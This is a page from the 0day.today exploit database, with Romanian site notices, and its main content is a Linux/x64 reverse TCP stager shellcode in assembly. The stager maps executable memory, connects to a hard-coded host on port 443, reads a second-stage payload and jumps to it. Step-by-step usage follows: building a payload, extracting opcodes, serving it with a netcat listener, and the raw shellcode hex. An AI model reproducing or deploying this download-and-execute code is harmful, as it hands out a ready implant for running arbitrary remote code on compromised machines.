0day.today - Ce-a mai mare baze de date de exploit-uri din lume.
![](/img/logo_green.jpg)
Folosim un singur domeniu DOMAIN_LINK
Dacă dorești să cumperi un exploit sau să platești pentru un serviciu, trebuie să cumperi Gold. Nu dormim să folosim site-ul pentru scopuri informatice negative (hacking), prin urmare orice tip de acțiune de hacking care poate afecta ilegal alți utilizatori sau pagini web la care nu ești proprietar va fi pedepsită cu blocarea contului permanentă incluzand distrugerea datelor tale care aparțin de cont.
Administrația acestui website folosește adresele oficiale de contact. Atenție la impostori!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Citiți [ acordul ]
- Citiți [ trimite ] reguli
- Vizitați [ Întrebări frecvente. ] pagină
- [ Înregistrare ] profil
- Obține [ GOLD ]
- Dacă dorești să [ vinzi ]
- Dacă dorești să [ cumperi ]
- Dacă ați pierdut [ cont-ul vizitați această pagină. ]
- Orice întrebări [ [email protected] ]
- Pagină de autorizare
- Pagină de Înregistrare
- Pagină de restaurare a unui cont
- Pagina FAQ
- Pagina de contact
- Regulamentul pentru post-uri
- Pagina de acorduri
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ne puteți contacta prin:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)
;# Title: Linux/x64 - Reverse TCP Stager Shellcode (188 bytes) ;# Author: Lee Mazzoleni ;# Tested on: Ubuntu 18.04.2 LTS ; reverse tcp stager - download and execute up to 4096 bytes of additional payload - no null bytes in this ; this code is 188 bytes total (less if you delete the exit() syscall at the end) global _start section .text _start: ;// =================> ;// HEAP ALLOCATION => ;// =================> xor rax, rax mov al, 6 mov cl, 2 imul ax, cx ;// int brk() xor rdi, rdi syscall ;// brk() xor rax, rax mov al, 2 mov cl, 6 imul ax, cx xor rdi, rdi mov dil, 128 imul di, 32 syscall ;// brk(0x1000) - 4096 bytes xchg rcx, rax ;// save addr of our allocated memory in rcx ;//=======================> ;// MAP HEAP PERMISSIONS => ;//=======================> xor rax, rax mov al, 9 xchg rdi, rcx xor rsi, rsi mov sil, 128 imul si, 32 xor rdx, rdx mov dl, 0x7 xor r10, r10 mov r10b, 0x21 xor r9, r9 mov r8, -1 syscall ;// mmap(addr, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0) mov r9, rax ;// save heap address in r9 ;// ===================> ;// SOCKET CONNECTION => ;// ===================> xor rax, rax mov al, 41 ;// int socket() xor rdi, rdi inc rdi inc rdi ;// AF_INET xor rsi, rsi inc rsi ;// SOCK_STREAM xor rdx, rdx mov dl, 6 ;// IPPROTO_TCP syscall ;// socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) push rax pop rdi ;// save the socket's fd in rdi for connect() to use xor rax, rax push rax mov dword [rsp-4], 0x2a37a8c0 ;// 192.168.55.42 mov word [rsp-6], 0xbb01 ;// port 443 in lil' endian sub rsp, 6 push word 0x2 xor rax, rax mov al, 42 ;// int connect() mov rsi, rsp xor rdx, rdx mov dl, 16 syscall ;// connect(3, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("192.168.55.42")}, 16) ;// ====================================> ;// READ CODE FROM SOCKET FD INTO HEAP => ;// ====================================> mov rsi, r9 ;// heap addr still saved in r9 xor rdx, rdx mov dl, 41 ;// CHANGE THIS NUMBER TO SUIT THE SIZE OF YOUR PAYLOAD (41-byte payload used in testing) xor rax, rax syscall ;// read(3, heap_addr, SIZE) ;// =================> ;// CLOSE SOCKET FD => ;// =================> xor rax, rax mov al, 3 syscall ;// close(3) jmp r9 ;// jmp to the heap address in r9 and execute the downloaded payload ;// =========> ;// EXIT(0) => this bit is unnecessary if your payload already calls exit() ;// =========> xor rax, rax mov al, 60 xor rdi, rdi syscall ; ===============> ; ===== Usage ===> ; ===============> ; ========================================================================================= ; this program downloads a secondary payload from a remote host, and executes it. ; in this example, the payload used will be a simple hello-world-like program (hello.asm): ; ========================================================================================= ; global _start ; section .text ; _start: ; mov rax, 1 ; mov rdi, 1 ; mov rsi, 0x0a21216f6c6c6548 ; "Hello!!\n" ; push rsi ; mov rsi, rsp ; mov rdx, 8 ; syscall ; mov rax, 60 ; xor rdi, rdi ; syscall ; ========================================================================================= ; 1.) compile your payload: ; ----------------------------------------------------------------------------------------- ; nasm -f elf64 hello.asm -o hello.o && ld hello.o -o hello && rm hello.o ; ========================================================================================= ; 2.) retrieve the opcodes for the payload: ; ----------------------------------------------------------------------------------------- ; objdump -d hello|grep -v '^$\|start>\|file format\|Disassembly'|cut -d' ' -f2-9|sed -E "s/\ [0-9a-f]{6}://g"|grep -Eo '[a-f0-9]{2}'|tr -d '\n' ; echo ; b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05 ; ========================================================================================= ; 3.) count how many bytes are in your payload (41 bytes) and update line 86 to reflect this: ; ----------------------------------------------------------------------------------------- ; echo b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05|grep -Eo '[a-f0-9]{2}'|wc -l ; 41 ; ========================================================================================= ; 4.) decode the bytes into raw form and serve it via netcat listener: ; ----------------------------------------------------------------------------------------- ; echo -n b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05 | xxd -r -p > payload ; nc -lvp 443 < payload ; listening on [any] 443 ... ; ========================================================================================= ; 5.) one last step before compiling this stager, add your own IP address to line 69: ; ----------------------------------------------------------------------------------------- ; import struct, socket ; print(hex(struct.unpack('<L', socket.inet_aton('192.168.55.42'))[0])) ; 0x2a37a8c0 ; ========================================================================================= ; 6.) compile and run this shellcode - it will connect to your netcat listener, download & exec the raw payload ; ----------------------------------------------------------------------------------------- ; nasm -f elf64 stager.asm -o stager.o && ld stager.o -o stager && rm stager.o ; ./stager ; Hello!! ; ========================================================================================= ; Raw paste: ; 4831c0b006b102660fafc14831ff0f054831c0b002b106660fafc14831ff40b780666bff200f0548914831c0b0094887f94831f640b680666bf6204831d2b2074d31d241b2214d31c949c7c0ffffffff0f054989c14831c0b0294831ff48ffc748ffc74831f648ffc64831d2b2060f05505f4831c050c74424fcc0a8372a66c74424fa01bb4883ec06666a024831c0b02a4889e64831d2b2100f054c89ce4831d2b2294831c00f054831c0b0030f0541ffe14831c0b03c4831ff0f05 # 0day.today [2024-07-02] #